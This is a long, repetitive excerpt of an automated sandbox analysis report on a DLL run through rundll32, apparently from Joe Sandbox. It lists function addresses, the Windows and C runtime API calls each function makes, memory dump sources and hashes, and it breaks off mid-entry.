                                                                                                                                    • API String ID: 2459298410-0
                                                                                                                                    • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                    • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                                    • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                    • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 365290523-0
                                                                                                                                    • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                    • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                                    • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                    • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rect$DesktopVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1055025324-0
                                                                                                                                    • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                    • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                                    • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                    • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 1002C6E7
                                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                    • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 26245289-0
                                                                                                                                    • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                    • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                                    • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                    • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                    • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                                    • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                    • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                    • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                    • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                                    • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                    • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetDC.USER32(?), ref: 1002658E
                                                                                                                                    • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                                    • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3511876931-0
                                                                                                                                    • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                    • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                                    • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                    • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __msize_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1288803200-0
                                                                                                                                    • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                    • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                                    • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                    • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePeek$H_prolog3
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3998274959-0
                                                                                                                                    • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                    • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                                    • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                    • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                                      • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                                      • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                                    • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1532457625-0
                                                                                                                                    • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                    • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                                    • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                    • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                                      • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                                    • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                                    • _strtol.LIBCMT ref: 10022CB5
                                                                                                                                    • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                                      • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4211061542-0
                                                                                                                                    • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                    • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                                    • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                    • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3253174383-0
                                                                                                                                    • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                    • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                                    • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                    • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2161412305-0
                                                                                                                                    • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                    • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                                    • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                    • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                    • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1615547351-0
                                                                                                                                    • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                    • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                                    • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                    • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                    • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
